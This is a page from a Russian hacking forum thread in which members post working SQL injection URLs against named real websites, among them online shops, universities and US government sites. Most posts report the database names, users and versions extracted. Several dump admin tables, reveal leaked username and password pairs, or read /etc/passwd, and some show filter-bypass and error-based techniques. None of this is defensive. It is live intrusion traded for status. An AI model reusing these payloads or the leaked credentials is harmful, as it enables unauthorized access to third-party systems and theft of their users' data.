FORUM.ANTICHAT.RU


PDA

Смотреть полную версию : SQL Инъекции


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 [56] 57 58 59 60 61 62 63 64

SergioBlog
10.04.2011, 12:27
Сори ошибся топиком =\

stepashka_
10.04.2011, 13:05
http://www.biznes-navigator.ru/Admin/
5.0.91-community


4.1.25-log

Amoura
10.04.2011, 15:16
http://www.gisupport.ru/info.php?id=-12+union+select+1,2,3,4,5,6,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,8,9,10,11,12--


compnn_test:5.0.90-log:compnn_test@localhost

mix0x0
10.04.2011, 18:07
http://www.landlords.ru/fullnews.php?id=-100+union+select+1,group_concat%28username,char%2858%29,password%29,3,4,5+from+admin%20--
idinahuihakergolimiy :D
уже кто-то здесь побывал)

S[N]EP
10.04.2011, 19:01
ТИЦ - 325

http://www.autoexpres.ru/cars1.php?mode=card&p=0&sort=0&updown=0&foto=1&id=-23427+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,39,40,41,42,43,44,45,46,47,48,49,50,51,52--

5.1.46:admin_expres@localhost:admin_expres

52 колонки, пипец :D

stepashka_
10.04.2011, 21:20
4.1.25-log
тиц 20


4.1.25-log
тиц 40

IScript
10.04.2011, 21:36
http://www.sozdanie.com/index.php?date='2705.04.11
Вот удалось найти уязвимость!

Amoura
10.04.2011, 22:08
http://www.yotaservis.ru/goods.php?id=43+union+select+1,2,3,4,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,6,7,8,9,10--

db8508a:5.1.54-log:us8508a@10.0.1.38


http://ctdcom.ru/dizpr.php?id=1+union+select+1,2,3,4,5,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29--

u0735336_std:5.5.9:u0735336_stdcom@localhost

Skofield
11.04.2011, 01:25
2.

Инъекции вида:

http://site.ru/index.php?a='

будут удаляться.

http://www.sozdanie.com/index.php?date=2705.04.11'+union+select+1,version(),3,4,5,6,7,8,9,0,11/*

stepashka_
11.04.2011, 09:06
mrinstrum_board3@localhost:mrinstrum_board3:5.0.26-log
тиц 10

eclipse
11.04.2011, 14:15
Universidad Blas Pascal : PR - 6
Эксплойт


DB VERSION:4.1.11-Debian_4sarge7-log
DB NAME: UBPSITE
USERNAME: ubpsite@localhost

ubi
12.04.2011, 09:57
http://www.kylincorp.com/en/pview.php?id=-646+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4,5,6,7,8,9,10,11,12,13,14,15+--+

Konqi
12.04.2011, 13:54
Колонка 3 попадает в функцию include()

http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,'../../../../../etc/passwd'--+

магия активирована, поэтому захексим

http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764--+

ubi
13.04.2011, 04:14
http://aalborgstift.dk/pdb/pview.php?id=-705+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,userId,userName,password),9,10,11+from+user+--+

PR3

veter069
13.04.2011, 10:46
http://www.elephant.se/search.php?q=%22%20and%201=2%20union%20select%20CONCAT(user(),0x3a,version())/*%20and%20char(124)%20user%20char(124)=0%22%20and%20%22x%22=%22x

av1
14.04.2011, 03:07
http://www.master-naba.com/page.php?contentId=-377+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--

username: master_naba_com@85.235.130.54
version: 5.0.45-log
database: master_naba_com

Google PR: 5

nikp
14.04.2011, 12:15
Вариант вывода error-based SQLi

mix0x0
14.04.2011, 17:04
ViewSonic ®

http://www.viewsonic.com.au/kbase/article.php?id=-128+union+select+1,group_concat%28CHAR%2832,58,32%29%20,username,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+vsau.internal_users%20--

IP: 60.248.78.41 //Тайвань
user: web@localhost
database: vsau

tables
activity_log, auction_items, crt_displays, dist_info, ecard_categories, ecard_templates, enews, enews_clicks, eregtmp, finch_prize, finch_redeem, finch_sales_results, internal_groups, internal_users, kbase, lcd_displays, map_state, meta_specs, mktg_assets, model_prices, name_to_id, name_to_models, online_service, order_items, pr, product_info, product_reviews, programs, projectors, res_accounts, res_goods_io, res_inventory, res_level_history, res_sales_info, resellers, resinv_format, ressales_import_log, retained_values, user_info, vote, wareg, web_orders, web_promos

Skofield
14.04.2011, 23:25
http://www.wesleyan.edu.ph/media.php?id=-17+union+select+version(),2,3,concat(user(),0x3a,database())--
version: 5.0.91-community

ubi
15.04.2011, 18:40
http://buddie.me/music.php?id=-113482+union+select+1,concat_ws(0x3a,name,password),3,4+from+users+--+

AC//DC
16.04.2011, 08:33
http://www.sirius.perm.ru/cat.php?part=-7%20and%201=2%20union%20select%201,concat_ws(char(58),@@version,user(),database())+--

5.0.32-Debian_7etch1 sirius@hosting3.ccl.ru dbsirius_1

ubi
16.04.2011, 09:06
http://oldtownrestaurant.co.uk/food.php?id=-1+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4+--+

oldtown_sql@localhost: oldtown_sql:5.0.92-community

Megwarez
17.04.2011, 11:23
http://www.mapadelisboa.com/li.php?id=-1+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+information_schema.tables+--

PR4

Все норм выводится но админку не нашел

http://www.profumodizagara.com/ricette/rc.php?id=-1+union+select+1,2,group_concat%280x0b,table_name%29,4,5,6,7,8,9,10,11+from+information_schema.tables+--

PR3, DMOZ

S[N]EP
17.04.2011, 15:57
http://www.pchelovod.com/index.php?correct=142%27+and+1=0++Union+Select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29--+
5.1.46: pchelovod_shop@localhost: pchelovod_shop
Вывод в титле
тиц 60

moodoone
17.04.2011, 19:46
http://chicken.kiev.ua/news_restoran.phtml?id=-2999+union+select+1,2,3,4,5,6,concat_ws(0x3a,email,login),8,9,10,11,12,13,14+from+login--
ТИЦ 220
PR 4
http://download.in.ua/program.phtml?os=win&id=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C%28SELECT+concat%280x7e%2C0x27%2CCompany.Cm_email%2C0x27%2C0x7e%29+FROM+%60db_westbyte_1%60.Company+Order+by+Cm_email+LIMIT+0%2C1%29+--
Вывод в исходнике. Выводит юзверей.
<meta name="keywords" content="~'00790@mail.ru'~" />
Тиц 40
PR 4

av1
17.04.2011, 23:57
http://www.lawyersalliance.com.au/public.php?id=-25+union+select+1,2,cast%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%20as%20binary%29,4,5,6,7,8%20from%20users--

Username: ALA_admin@localhost
Version: 4.1.11-standard
Database: ALA

Google PR: 5

admin

Megwarez
18.04.2011, 17:23
http://www.g1expo.com/artists-ch.php?id=-1+union+select+1,2,3,4,5,group_concat%280x0b,table_name%29,7+from+information_schema.tables+--
PR 5

Jаger
18.04.2011, 20:44
http://www.teleradiocom.tj/index.php?action=fullnews&id=-50 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,id,username,password),10,11,12,13,14,15,16,17,18,19 from users limit 0,1

S[N]EP
19.04.2011, 00:08
Helloworld.ru

Ашибочка :)

http://www.helloworld.ru/show.php?curraz=27+and+1=0+union+select+UNHEX%28HEX%28CONCAT_WS%280x3a,database%28%29,version%28%29,user%28%29%29%20%29%29

hellowor_hello:5.0.91-community:hellowor_hello@localhost

bloodAngel
19.04.2011, 07:23
shop ))

5.0.41-community-log: ISMBMDR_webdb_drsha

av1
19.04.2011, 09:02
http://www2.hud.ac.uk/staffprofiles/staffcv.php?staffid=-508+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,22--

Username: clseditor@tamnavulin.talisker.hud.ac.uk
Version: 5.1.55-log
Database: staffprofiles

Google PR: 4

Cennarios
19.04.2011, 09:15
http://www.unisdr.org/africa/events/index.php?rid=0&timeID=1&tid=0&oid=6)+or+1+group+by+concat((select+concat(user(),0x3a3a,User,0x3a3a,file_priv)+from+mysql.user+limit+3,1),floor(rand(0)*2))+having+min(0)--+&hid=60

Баанк!!!(co Jay & Silent BOB) =)

Dr..VATSON
19.04.2011, 10:45
http://sbbrasil.com.br/php/paginas/site/jogador/verjogador.php?id=-19+union+select+1,2,3,4,5,version%28%29,7,8,9,10,11,12,13,14--

5.0.91-community

S[N]EP
19.04.2011, 15:49
Какой-то шоп, PR-5
http://www.able.org/store/item-description.php?id=-5%27+union+select+1,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14,15,16,17--+

verion - 5.0.77

Megwarez
20.04.2011, 16:24
http://www.iotma.ncku.edu.tw/new.php?id=-1+union+select+1,group_concat%280x0b,table_name%29,3,4+from+information_schema.tables+--

5.0.45-community-nt

SEWERN
20.04.2011, 20:01
http://www.product-key.com/product.php?id=-10+union+select+1,user(),3,4--

bloodAngel
21.04.2011, 10:59
Page Rank 6
Yandex Тиц 10

ta-kyn
21.04.2011, 14:03
http://tao.cgu.org.tw/index.php?id=%28892%29+and+%281%29=%282%29+union+select+1,2,3,4,5,6,7,8,USER%28%29,DATABASE%28%29,VERSION%28%29,12,13,14,15,16+--

tao@localhost - tao - 5.0.51a-24

bloodAngel
21.04.2011, 16:32
4.0.18-standard-log


version : 5.0.45

Amoura
22.04.2011, 08:56
http://www.kisan.com.ua/g.php?id=-1+union+select+1,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,3--


kisan:4.1.22-log:kisan@alpha

genzome
23.04.2011, 08:04
http://www.trpbrakes.com/category.php?catid=-183+union+select+1,2,version%28%29,4,5,6--

5.1.47-COMMUNITY-LOG
PR4

genzome
23.04.2011, 08:17
http://www.thorshofn.is/category.php?catID=-17+union+select+1,2,version%28%29,4,5,6,7--

4.0.18-standard-log

Amoura
23.04.2011, 12:53
http://www.buktour.com.ua/plan.php?id=-3+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6--

buktour_bd2:5.0.92:buktour_uesre@localhost


http://www.buktour.com.ua/plan.php?id=-3+union+select+1,2,concat_ws%280x3a,login,password%29,4,5,6+from+auth--



http://autoportal.od.ua/?a=test_full&id=-77+union+select+1,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,3,4,5,6--

auto_db:4.1.22-standard:auto_root@localhost

bloodAngel
23.04.2011, 19:30
skatelv@localhost 5.1.41-3ubuntu12.10

Pr 5
Тиц 10

eclipse
23.04.2011, 21:13
http://www.sci.nu.ac.th : PR - 5

Уязвимый скрипт
E:\wwwroot\sciweb\webboard\view.php

Эксплойт
_http://www.sci.nu.ac.th/webboard/view.php?dep=bio&id=1+union+select+1,2,3,group_concat%28table_name%29,5,6,7+from+information_schema.tables+--+
Тип БД :MySQL
Версия БД: 5.1.37-1ubuntu5.1

Имя ДБ: Weboard
Имя пользователя: tanakornp@webdata_1000

eclipse
24.04.2011, 08:55
theperfectworld.us/: PR - 4

Уязвимый скрипт
/home/perfecto/perfectworldtoo.us/public_html/preflight/indexFunctions.php

Эксплойт
_http://www.theperfectworld.us/thread.php?id=-1'+union+select+substring(group_concat(table_name),250),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
Тип БД :MySQL
Версия БД: 5.1.53-log

Имя ДБ: perfectdb
Имя пользователя: perfectdb@jmkdb.theperfectworld.us

Amoura
24.04.2011, 12:57
http://www.san-accessory.ru/productinfo.php?kod=1402.310+and+1=2+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14--

MIRMEX_PROMO1:5.1.37-1UBUNTU5.5-LOG:MIRMEX_PROMO1@LOCALHOST

hide
24.04.2011, 13:10
http://www.orientalstudies.ru/rus/index.php?option=com_personalities&Itemid=74&person=-11+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID%28%28select+version%28%29+limit+0,1%29,1,63%29,FLOOR%28RAND%280%29*2%29%29%29+--+
www.orientalstudies.ru
version 5.0.37
pr7 тиц375

CodeSender:)
24.04.2011, 14:54
http://www.linorusso.ru/catalog.php?parent_id=&tov_id=952+union+select+1,concat_ws(0x3a,login,pass),3,4,5+from+opt_user--+

http://www.pokupka.perm.ru/index.php?page=2&cat_sale=-20+UnIon+selECt+1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+

http://www.intelstudy.ru/schools.php?so=showschool&s_id=216&ct_id=-40+UnIon+selECt+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18--+

http://www.intour.ru/countries.php?country_id=-404+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,uNhex%28hEx%28coNcaT_wS%280x3a,username,user_password%29%29%29+FroM+phpbb_users+LimiT+1,1+--+

Cennarios
25.04.2011, 01:18
Хостинги

http://www.eswap.ca/host/mod.php?mod=faq&mode=show&faq_id=3/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,table_name,16/**//*!from*//**/information_schema.columns--+

Массовый дамп в выводе =)

http://www.glorihosting.com/info.php?id=-24%27+union+select+1,2,user%28%29,version%28%29,5,6,7--+



Лучше бы мне нас**ли в утреннюю кашу! Баанк!!! (со Jay & silent Bob)

Amoura
26.04.2011, 15:06
http://nabazar.com.ua/?action=items&id=-11291+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

nabazar_board:5.0.22:nabazar@localhost

XAMEHA
26.04.2011, 15:37
http://1dnevnik.ru/schools/i/logo.png
http://1dnevnik.ru/schools/school.php?id=%28-83942%29union%28select%201,2,3,4,version%28%29%29
Ломоем школьнегов

Amoura
27.04.2011, 00:51
http://www.nasha-spravka.ru/?abc=2&city=-129+union+select+concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29--

spravka_2:5.1.56:spravka_2@localhost


http://vsemisto.com.ua/index.php?page=2&id=4643+union+select+1,2,3,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,5,6,7,8,9,10,11,12,13,14,15--

dovidka_vm:5.1.47-community-log:dovidka_user@webua1.ukrhosting.com

winstrool
27.04.2011, 11:09
5.0.86:fanfooty@localhost:fanfooty



5.1.47-community-log:xaoonet_super@localhost:xaoonet_super



5.0.51a:db_java_bookz@localhost:db_java_bookz

шкoльнек
28.04.2011, 05:57
4.1.21-log : udb5600 : Uwww5600S@localhost

ubi
28.04.2011, 07:21
http://i026.radikal.ru/1104/1a/7cde65a16038.jpg

http://www.arabdetroit.com/news.php?id=-27335'+union+select+1,concat_ws(0x3a,user,password),3,4,5,6,7,8+from+config--+
PR 5
Хэши не расшифровал.

LiRvD082
28.04.2011, 12:35
Admin31da206ea6d47ec8a5e979b6bf44d681:pedro1954



nadeem:khan,mudit123:muditmisra,shivani@magnifix.co.nz:5767571,marc@magnifix.co.nz:2650070,mudit@magnifix.co.nz:navya28,satwinder@magnifix.co.nz:2650070,darshak@magnifix.co.nz:2650070

XAMEHA
28.04.2011, 12:49
http://s59.radikal.ru/i164/1104/2f/c217e6b735a3.png
http://www.tvigle.ru/img/v3/l.png
PR-6
http://www.tvigle.ru/category/cinema/video/?sort=-1884%29%29+union+select+1,2,concat_ws%280x3a,id,name,email,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tvigle_rf.be_user+limit+20,1000+--+

Amoura
28.04.2011, 21:44
http://www.womencraftlink.net/showFoto.php?galName=galerie_6&id=134+union+select+1,2,concat_ws%280x3a,database%28%29,version%28%29,user%28%29%29,4,5,6,7,8--

peyer_main:5.0.51a-24+lenny5:peyer@localhost

DezMond™
29.04.2011, 13:20
linn.dlrg.de
http://linn.dlrg.de/termine.html?tx_dlrgterminkalender_pi1%5Baction%5D=read&tx_dlrgterminkalender_pi1%5Btid%5D=-51+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&cHash=b6bf96f6dac665abaea06aea2e150c3c
abayan.de PR3
http://www.abayan.de/index.php?id=4&no_cache=1&cmode=99&pg=&mode=3&lanid=1180&anbid=1063&erzid=1180+union+select+1,2,3,4,5,id,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+user+--+&cHash=f4dbe36977d98285737a48d8aa7cb3a3
kindermissionswerk.de PR5
http://kindermissionswerk.de/shop/index.php?sessionid=39409321486eb6f3a00e66a0623f1e61&kat=-99+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+group+by+table_schema+limit+0,1+--+&actiontyp=artikelinwarenkorb
neoriginal.ru ТИЦ50
http://www.neoriginal.ru/cat/audi/part/u/0/mod/77/kat/264/year/2004/grp/1/idcnt/15/subgrp/-24431+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+--+
feierwerk.de PR4
http://feierwerk.de/angebote/dschungelpalast/programm/details.html?tx_wfqbe_pi1%5Beid%5D=1967+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+information_schema.tables+--+
asso.angers.fr PR4
http://asso.angers.fr/detail_asso.php?id_asso=-5974+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,login,20,21,22,23,24,25,26+from+admin+--+
campus.igw.edu
http://campus.igw.edu/kursliste/kurse_detail.php?kursID=-4411+union+select+1,2,3,4,5,6,LOAD_FILE(0x2F6574632F706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65+--+&SN=wvimqrfaf
contrefacon-danger.com PR7
http://www.contrefacon-danger.com/front/show_rub.php?rub_id=260&archive=0'+union+select+1,2,3,4,5,6,unhex(hex(user())),8,9,10,11,12,13+--+
zenar.boku.ac.at PR5
http://zenar.boku.ac.at/en/links/links_detail.php?ID=-1+union+select+1,2,3,4,5,6+--+
wallawalla.edu PR5
http://www.wallawalla.edu/academics/library/typo3/showdescr.html?ID=-22'+union+select+1,2+--+
site.medair.org
http://site.medair.org/en_portal/hr/job/job_details_hq.php?jcode=-CH_HQS_GAM'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+/*+
bioinf-applied.charite.de
http://bioinf-applied.charite.de/fragment_store/src/download.php?fragment_id=-374+union+select+user()+--+
esellers-guide.de PR2
http://esellers-guide.de/index.php?page=view_text&type=articles&category=19&pre_category=1&text_id=-37'+union+select+1,2,3,4,5,6,7,8+--+
fondation-saint-hubert.be PR4
http://www.fondation-saint-hubert.be/visu.php?cible=-18+union+select+1,2,3,4,5,6+--+
suurmond.be PR2
http://www.suurmond.be/producten/groep.php?groepid=-50+union+select+1,2,3,4,5,6,7,8,9,10,11+--+&merk=0'
dmc.metu.edu PR5
http://www.dmc.metu.edu/DMC/download.php?fname=./config.php

winstrool
29.04.2011, 16:35
вывод в исходниках:





zaward@zaward.com5.0.51a-3ubuntu5.8db_zaward


5.0.89-log:u6351@be2:u6351

Melfis
29.04.2011, 20:57
PR3
http://www.dushka.ru/gstore.phtm?g=-11+union+select+1,version()--
почти весь хостинг подвержен этому

winstrool
29.04.2011, 23:20
PR: 4

Cennarios
30.04.2011, 01:04
http://www.esne.edu/noticias2.php?info=Noticias&Id=-354+union+select+1,user%28%29,3,4,5--+

eclipse
30.04.2011, 06:43
Freece.com : PR - 4

MSSQL VERSION:Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) Apr 2 2010 15:48:46 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64> (Build 7600: )

DATABASE:Pharmcon
USERNAME:PharmCon_reader
VULN SCRIPT PATH:D:\www\FreeCE_classic\www\forum\Forum_Details.asp
Exploit:


IMPORTANT TABLES:
tbEmailAddresses
tbForum
tbInstructors

tblUsers
-User_ID
-UserName
-Password

Melfis
30.04.2011, 15:29
.......

assinjeans
01.05.2011, 11:17
http://www.azizbehich.com/news.php?id=-132+union+select+1,2,3,version(),user(),6,7,8,9,10+--
4версия=(

ubi
01.05.2011, 19:17
http://s012.radikal.ru/i319/1105/3a/0b3306995689.jpg
http://sportpickgoods.com/view.php?id=-61738+union+select+1,concat_ws(0x3a,name,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+tb_admin--+

Dr..VATSON
01.05.2011, 20:57
http://www.elavik.ru/catalog.php?action=goods&id=-177+union+select+version%28%29,2+--+

5.1.41-log

Cennarios
02.05.2011, 01:51
http://www.bryantx.gov/include/press_release.asp?id=-1107/**//*!union*//**//*!select*//**/1,2,3,4,5,6,7,8,user%28%29,10,11,12--+

Osstudio
02.05.2011, 13:08
http://portalxm.com/index.php?id=1'+and+1=0+union+select+1,2,3,group_concat(table_name+separator+0x3a),5,6,7,8,9+from+information_schema.tables+where+table_schema=0x76696e746167645f617a697a/*

Tigger
02.05.2011, 15:30
тИЦ 600
http://www.efko.ru/page.php?id=37'+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version())--+

Вывод в Location: The requested URL /newefko@localhost:newefko2:5.0.77-log was not found on this server.

-------------------
EDU:
http://casgroup.fiu.edu/dll/events.php?id=459+and+1=2+union+select+1,UNHEX(HEX(concat_ws(0x3a,user(),database(),version()))),3,4,5,6,7,8,9--+

casweb@GOPANTHER.fiu.edu:cas:4.1.14-nt-log

-------------------

http://globalanuncio.com/view.php?id=56688+and+1=2+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),version(),database()),13,14,15,16,17,18,19,20,21--+

globaldbuser@localhost:5.0.77:globalanuncio

-------------------

http://onlineoffshore.info/RU/juridiction/index.php?LG=RU&JURI=bbb'+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),version(),database())--+

calculator@cgi1401.int.bizland.net:5.0.91-log:onlineoffshoredb

------------------

http://pole1.ru/tovar.php?id=8+and+1=2+union+select+1,2,UNHEX(HEX(concat_ws(0x3a,user(),version(),database()))),4,5,6,7--+

aqq7328_strina@localhost:5.0.92-community-log:aqq7328_lopata

"Чудо лопата" :D

--------------------

Шоп

http://www.arttoframes.com/cartmanager_search.php?parent_sku=cdm-144-FRBW26061&size=36x12&color=215'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(version(),floor(rand(0)*2)))--+

Duplicate entry '5.0.451' for key 1

-----------------

http://www.bienesonline.com/venezuela/inmobiliarias.php?ID=15+and+1=2+union+select+concat_ws(0x3a,user(),version(),database())--+

admin_bieneson@localhost:5.0.67-community-log:admin_bienes_venezuela

-----------------

http://www.birdjam.com/article.php?gid=0'&hilow=asc&monyr=4-2011&page=twitch_hiscores'+and+1=2+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11--+

birdjam2@localhost:5.0.27:birdjam2

-----------------

http://www.cymbalhouse.com/shopping/pgm-more_information.php?id=1602'+and+1=2+/*!UnIon*/+selECt+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--+

zilze3_sope1@localhost:5.1.52:zilze3_sope1

-------------------

ВсеМайки.РУ - крупный сайт по продаже футболок со своей ПП.

http://www.vsemayki.ru/basket_to.php?id=795'+and+1=2+union+select+concat_ws(0x3a,user(),version(),database()),2--+&color=red&size=M%20%2846-48%29&model=man&hand=short&num=1

vsemayki_ru@server.vsemayki.ru:5.1.50-rel11.4-log:vsemayki_ru

------------------

http://www.smdailyjournal.com/article_preview.php?id=66988+and+1=2+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15--+

smdaily2@localhost:4.0.25:smdaily2

Jerri
02.05.2011, 19:58
other@localhost:5.0.45-log:sfors

bloodAngel
02.05.2011, 22:17
шоп

http://riddim.de/new.php?id=-348+union+select+1,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+where+table_name%3E0x7461626C655F343030--

http://riddim.de/new.php?id=-348+union+select+1,2,3,4,database%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18--

database: riddim

winstrool
03.05.2011, 12:34
5.0.92-community:wwwlej_ro@localhost:wwwlej_db4

durito
03.05.2011, 15:03
http://www.datefinder.co.nz/member/user_profile.asp?user_id=-185%20UnIon+selECt+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+

5.0.27-community

winstrool
03.05.2011, 17:49
PR: 1

5.0.91-log:cenat_db:cenat@10.194.10.112

totenkopf
03.05.2011, 17:51
http://www.tisc.co.uk/print.php?pid=-51+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
tisc@localhost:5.0.77:tisc

http://felixonline.co.uk/print.php?article=-900+UNION+SELECT+concat_ws(0x3a,user(),version(),database())+--+
media_felix@localhost:5.0.90-log:media_felix

http://www.lccc.co.uk/print.php?p=news&id=-3313+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,user(),version(),database()),17,18,19,20,21,22,23,24,25,26,27,28+--+
lccc-root@localhost:5.0.51b-log:lcccmain

http://www.inspire.org.uk/new/print.php?page=-135+UNION+ALL+SELECT+NULL,NULL,NULL,concat_ws(0x3a,user(),version(),database()),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+
inspire_webuser@localhost:4.1.22-standard:inspire_webdbase

http://www.simplynetworking.es/advert_clicks.php?id=-416+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3b,0x3b,user(),version(),database()),8,9,10,11,12,13,14,15+--+
simply@localhost;4.1.22;simply_networking

http://www.wilcocksassociates.co.uk/articles.php?id=-9258+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
wilcock2_site@localhost:5.0.92-community:wilcock2_site

Cennarios
04.05.2011, 00:39
http://www.auhs.edu/mainpage.php?pageID=-13/**//*!union*//**//*!select*//**/user%28%29,2,3,4,5,6--+

winstrool
04.05.2011, 00:51
5.0.92-community:discount_commerce


5.0.92-community:aaba_auct1@localhost:aaba_auct1

// по прозьбе трудящихся была убрана ;)


5.0.91-log:simpleas_2_w@209.68.1.191:simpleas_cma

zlo12
05.05.2011, 14:39
www.clei.cl
pr- 6

http://www.clei.cl/cleiej/paper.php?id=32+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),Database(),User()),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+LIMIT+1,1--

Database Version: 5.1.51-log
Database name: clei
User name: clei@localhost

eclipse
05.05.2011, 20:47
alphazone4.com :: PR - 3
Эксплойт
http://www.alphazone4.com/m/store/US.php?cat=1+union+select+1,substring%28group_concat%28unhex%28hex%28table_name%29%29%29,250%29,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+

5.0.77
admin@localhost
alphazone4

[RedSky]
05.05.2011, 21:03
Ситуация: пробельные символы попадают без юрлдекодирования в запрос + однострочным комментом запрос не отсечь.
Решение(замена пробельного символа, вывод в ошибке и закрытие ковычки, вместо ее отсечения):
http://www.vw-axsel.ru/catalog/tiguan/'/**/and(1)IN(select/**/1/**/from(select/**/count(*),concat(version(),floor(rand(0)*2))from(information_schema.tables)group/**/by/**/2)a)and'

eclipse
06.05.2011, 22:35
http://cakerysupplies.com/ : PR 4

Тип БД:МS ACCESS
Имя БД:cakery

Эксплойт


По ходу принтабельных столбцов не нашлось, крутить по типу блайнl не было смысла - БД как я понял служит только для обеспечения информацией о товарах, следовательно никаких паролей и юзеров там нет

winstrool
06.05.2011, 22:36
pr:5 тиц:350


тиц:40

infosfera@localhost:4.0.24_Debian-10sarge3-log:infosfera

pr:5

5.0.84:cagepris_user@localhost:cagepris_cms

eclipse
06.05.2011, 22:53
Законодательная Власть Штата Аризона

http://www.azleg.gov : PR 6

Тип БД:Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Имя БД:Status
Имя пользователя БД:webuser

Эксплойт

Таблицы

[RedSky]
06.05.2011, 23:56
Ситуация: вывод через двойной запрос
Решение:
http://mindlessgaming.com/?page=match&action=view&match_id=1'and(0)union select " 1'and(0)union select 1,version(),3,4,5,user(),7,8,9,10,11,12,13,14-- -"-- -

bloodAngel
07.05.2011, 10:53
